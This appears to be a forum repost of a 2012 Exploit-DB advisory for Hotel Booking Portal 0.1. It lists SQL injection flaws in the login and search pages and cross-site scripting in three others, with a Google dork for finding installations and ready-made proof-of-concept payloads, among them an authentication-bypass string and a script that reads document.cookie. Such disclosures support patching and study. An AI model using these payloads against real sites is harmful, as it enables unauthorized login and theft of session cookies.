Exploit Hotel Booking Portal 0.1 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20476
Проверка EDB
  1. Пройдено
Автор
YAKIR WIZMAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-08-13
Код:
# -----------------------------------------------------------
#			   _____ _ _            _      _ 
#			  / ____(_) |          | |    | |
#			 | |     _| |_ __ _  __| | ___| |
#			 | |    | | __/ _` |/ _` |/ _ \ |
#			 | |____| | || (_| | (_| |  __/ |
#			  \_____|_|\__\__,_|\__,_|\___|_|
#			  
# -----------------------------------------------------------
# Hotel Booking Portal v0.1 Multiple Vulnerabilities
# Google dork: "Made And Powered By Hotels Portal"
# Bug discovered by Yakir Wizman, <[email protected]>
# Date 09/08/2012
# Download - http://sourceforge.net/projects/hbportal/
# ISRAEL
# -----------------------------------------------------------
#		Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
# 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
# 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# 1). POST a form to login.php with the value of:
# email set to		: ' or '1'='1
# password set to	: ' or '1'='1
# 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
# -----------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы